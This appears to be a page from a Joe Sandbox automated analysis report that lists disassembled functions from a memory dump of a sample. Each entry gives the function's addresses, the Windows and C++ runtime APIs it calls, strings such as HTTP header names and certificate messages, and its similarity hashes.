Function 00007FF7F12BC8D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12BCA3D

Strings

Host %s:%d was resolved., xrefs: 00007FF7F12BC950
too many IP, cannot show, xrefs: 00007FF7F12BCA70
IPv6: %s, xrefs: 00007FF7F12BCA87
IPv4: %s, xrefs: 00007FF7F12BCAB5
(none), xrefs: 00007FF7F12BC971

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: (none)$Host %s:%d was resolved.$IPv4: %s$IPv6: %s$too many IP, cannot show
API String ID: 356670603-234134439
Opcode ID: 8153fc1339c05b4a31981d61cdd86d221e8d9555c1a8d952db300991616d2cf9
Instruction ID: 12e0279f6f75498f3cd190b68d3f17c9f1dbfe35cb5a470f369f94348e7bd632
Opcode Fuzzy Hash: 8153fc1339c05b4a31981d61cdd86d221e8d9555c1a8d952db300991616d2cf9
Instruction Fuzzy Hash: 34519165B1868282FB64FB99D4103BAA750FF84790FC44032DA6DC76C6DFACE505C7A0

Function 00007FF7F128A984 Relevance: 10.6, APIs: 7, Instructions: 130COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F128A999
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F128A9BE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F128A9E9
std::_Facet_Register.LIBCPMT ref: 00007FF7F128AA60
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F128AA80
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F128AA93
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128AAFC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1531918476-0
Opcode ID: bdb4a8179d91b893c9809a5adfcef09e127626f7e6f9d959f141b95edb0eab16
Instruction ID: b7a9e3eb1fc6c3ae1760f3d49ca82625355c099b9c8862d3023df7b95e8a5fc4
Opcode Fuzzy Hash: bdb4a8179d91b893c9809a5adfcef09e127626f7e6f9d959f141b95edb0eab16
Instruction Fuzzy Hash: F951F462B0968681EB04ABA5D540379E360FF44BE0F984236DA7DC7AD5DFFCE44183A0

Function 00007FF7F12F3C05 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 2063679162-995577734
Opcode ID: b91238858ae0f21e4d4636808c12ccab0168ddea0a8873b11eedc77232b8cae9
Instruction ID: 2ddd24fa08acfb3b59ffaeceeb3a347682138c4e6396ee0203d9ae2bcb447e85
Opcode Fuzzy Hash: b91238858ae0f21e4d4636808c12ccab0168ddea0a8873b11eedc77232b8cae9
Instruction Fuzzy Hash: 26415321B0864742FB10ABA5D4942BA9791FF44794FC00031DA2DDB6C9EFBCE945C3A0

Function 00007FF7F12F3BC5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 2063679162-995577734
Opcode ID: 6b78cb315f5494224271437fbcc5eb7bda9dde55d497bbac7faf9c510f05d277
Instruction ID: 978e79ab9b39b4b4aa995f34ab6cce89c72db837cdd1a772f9e78235521975da
Opcode Fuzzy Hash: 6b78cb315f5494224271437fbcc5eb7bda9dde55d497bbac7faf9c510f05d277
Instruction Fuzzy Hash: AA415562B0868786EB10ABA5D4942FEA751FF44794FC00031DE2D976CADFBCE545C3A0

Function 00007FF7F12F3AC6 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12F45F0: SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F46C4

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Part of subcall function 00007FF7F12A8C50: SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12A8C8F

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3E53

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 1392487457-995577734
Opcode ID: 318670d4d47cb91031d490821861550af3f2e64b498bea5c7308063491d09d0c
Instruction ID: 289b7a8e8de768a5b6fa3368f270eb5175f8c2f47f1bb631392c3fdb5f0e9821
Opcode Fuzzy Hash: 318670d4d47cb91031d490821861550af3f2e64b498bea5c7308063491d09d0c
Instruction Fuzzy Hash: D9413522B0868792EB10ABE5D4941FAA751FF54794FC00031DA2D976CADFBCE545C3A0

Function 00007FF7F12F3AAC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Part of subcall function 00007FF7F12A8C50: SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12A8C8F

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3E53

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 1392487457-995577734
Opcode ID: 7e2a670cbc3751083aca8d844e7b0d524f3d7b7a038902c5b21e05b7bc75484a
Instruction ID: 3789626d7cf4ebfe91d060fe65e38879a57150ffef108e22b36abeac8a2ccb91
Opcode Fuzzy Hash: 7e2a670cbc3751083aca8d844e7b0d524f3d7b7a038902c5b21e05b7bc75484a
Instruction Fuzzy Hash: C9414326B0864792FB10ABA5D4942BAA751FF44794FC00031D92DDB6CAEFBCE545C3A0

Function 00007FF7F12F3BAC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Part of subcall function 00007FF7F12A8C50: SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12A8C8F

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3E53

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 1392487457-995577734
Opcode ID: 2a50b314edc6f43979e737df820437e0efbb8bb850c7ec20ac6bc0f10892b76a
Instruction ID: 9997bb1c6e83512557f5f031c601543971a28002401d0a0a315d1777f4b32b97
Opcode Fuzzy Hash: 2a50b314edc6f43979e737df820437e0efbb8bb850c7ec20ac6bc0f10892b76a
Instruction Fuzzy Hash: A1414422B0868792EB10ABE5D4941FAA761FF54794FC00032DA2DD76DADFBCE545C3A0

Function 00007FF7F13027DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302861
GetLastError.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F130286F
LoadLibraryExW.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302899
FreeLibrary.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302907
GetProcAddress.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302913

Strings

api-ms-, xrefs: 00007FF7F1302881

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 8624f1d6bf2c4c1a7a948945c122c0381f0908309d66990ca50ba45c37912b65
Instruction ID: 51769aa72afb2263c9ee15df35c3b8d73313bd5ccf0d4f6221af19b49ba6655f
Opcode Fuzzy Hash: 8624f1d6bf2c4c1a7a948945c122c0381f0908309d66990ca50ba45c37912b65
Instruction Fuzzy Hash: 00310421B0A68683EF11AB06A800574ABD4FF44BA4F99013DED3D467D0EFBCE54583A0

Function 00007FF7F12BE1B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86COMMON

Download Yara Rule

Strings

If-Unmodified-Since, xrefs: 00007FF7F12BE243
%s: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00007FF7F12BE2BA
Last-Modified, xrefs: 00007FF7F12BE234
Invalid TIMEVALUE, xrefs: 00007FF7F12BE1FE
If-Modified-Since, xrefs: 00007FF7F12BE252

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
API String ID: 0-4153637960
Opcode ID: 71013bad5970d87e38b486763537b573fbb0807149992ce27643df218a1bd120
Instruction ID: f20b814148185698b9db705f2eb6c29073ea3c364bccde3e2602b55fd1c760c1
Opcode Fuzzy Hash: 71013bad5970d87e38b486763537b573fbb0807149992ce27643df218a1bd120
Instruction Fuzzy Hash: C2419131B0C78286EB24EB59E45437AA3A0FB88780F940036EA5D87BD5DF7CE501DB90

Function 00007FF7F131B1CC Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211
FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B23E
FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B24F
FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B260
SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f586135cfffe647547bb3e4373b707e49dc246ec9808e567d0f2f57b533476da
Instruction ID: 5cfd71dd080980091e14d8312dd79a011d3b7084f5f1cad5535dc5189f08f412
Opcode Fuzzy Hash: f586135cfffe647547bb3e4373b707e49dc246ec9808e567d0f2f57b533476da
Instruction Fuzzy Hash: AE21AC20F0820283FB54B7B196551BDD2A25F487F0F96173CD93E26ADADFECA40242A1

Function 00007FF7F128C840 Relevance: 9.3, APIs: 6, Instructions: 255COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128C86E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F128C874
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128CA14
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F128CA20

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 1aff854877f73bb6f9236392da15bc26a5ee1d15a87ee2da434a669cd9ece3a6
Instruction ID: d59e0bb0b94713e2a343ca88e72f1d487c58095233dba4d5fc4dd6451acf760e
Opcode Fuzzy Hash: 1aff854877f73bb6f9236392da15bc26a5ee1d15a87ee2da434a669cd9ece3a6
Instruction Fuzzy Hash: 8AA1D262B09A8185EF14EFA9E4443BDA250FB44BE0F948636DA7D87BC5DFBCD0618350

Function 00007FF7F12FD5C4 Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FD634
MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FD6D2
LCMapStringEx.KERNEL32 ref: 00007FF7F12FD73B
LCMapStringEx.KERNEL32 ref: 00007FF7F12FD78D
LCMapStringEx.KERNEL32 ref: 00007FF7F12FD832
WideCharToMultiByte.KERNEL32 ref: 00007FF7F12FD88C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: e063a6a851dc2f0eeb99db24af6bf3ae3605f48f6ea8b6139f840cea37463809
Instruction ID: 8d63a0d8f0a9b94d30cc85ba8828fb50599c83ecac1ad23287f6b048e829ac6e
Opcode Fuzzy Hash: e063a6a851dc2f0eeb99db24af6bf3ae3605f48f6ea8b6139f840cea37463809
Instruction Fuzzy Hash: AB81B372B0874586EB20AF65E440269B3E1FF447A8F940235EA7D87BD8DFBCD4418790

Function 00007FF7F128A470 Relevance: 9.1, APIs: 6, Instructions: 122COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F128A485
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F128A4AA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F128A4D5
std::_Facet_Register.LIBCPMT ref: 00007FF7F128A54C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F128A56C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F128A57F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2286ac09ef35867ed1eb1894468d767ab9c51dcec0dff40988489e1ab873e3ce
Instruction ID: 35b9b5d0579e61e0df263e28a31e2b7ee5e7d27d442344c56abcc515f33513d2
Opcode Fuzzy Hash: 2286ac09ef35867ed1eb1894468d767ab9c51dcec0dff40988489e1ab873e3ce
Instruction Fuzzy Hash: A1419422B09A4181EB14EB95E4406BDF360FF94BA0F944132DA6DC7AD5DFBCE495C3A0

Function 00007FF7F1295290 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12952A5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12952CA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F12952F5
std::_Facet_Register.LIBCPMT ref: 00007FF7F129536C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F129538C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F129539F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: d4eeb21a3c3b0fdefeabdc4af922a824d23d33150b978b6823d1010be6d3530a
Instruction ID: 4e18ae6dda0e9db960f4397e923212b861e3760335f0958a23c7a45144e8114c
Opcode Fuzzy Hash: d4eeb21a3c3b0fdefeabdc4af922a824d23d33150b978b6823d1010be6d3530a
Instruction Fuzzy Hash: 2A318121B18A4285EB05BB99D44027DE351EF45BA0FC80132DA3DC76D5DFFCE4418BA0

Function 00007FF7F12953A8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12953BD
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12953E2
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F129540D
std::_Facet_Register.LIBCPMT ref: 00007FF7F1295484
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F12954A4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12954B7

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b9c3c37a5bf06acded864643137a0966a1345521f3ccc449669df12f3de2075d
Instruction ID: a16e0037006583a2aaa58262852b55a765d79129eb68258316a672b04c855b4a
Opcode Fuzzy Hash: b9c3c37a5bf06acded864643137a0966a1345521f3ccc449669df12f3de2075d
Instruction Fuzzy Hash: 8131B021B09A4291EB05FF99D800278E360FF44BA5FC81532DA3D876D5DFBCE44697A0

Function 00007FF7F1294C48 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F1294C5D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F1294C82
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F1294CAD
std::_Facet_Register.LIBCPMT ref: 00007FF7F1294D24
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F1294D44
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F1294D57

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

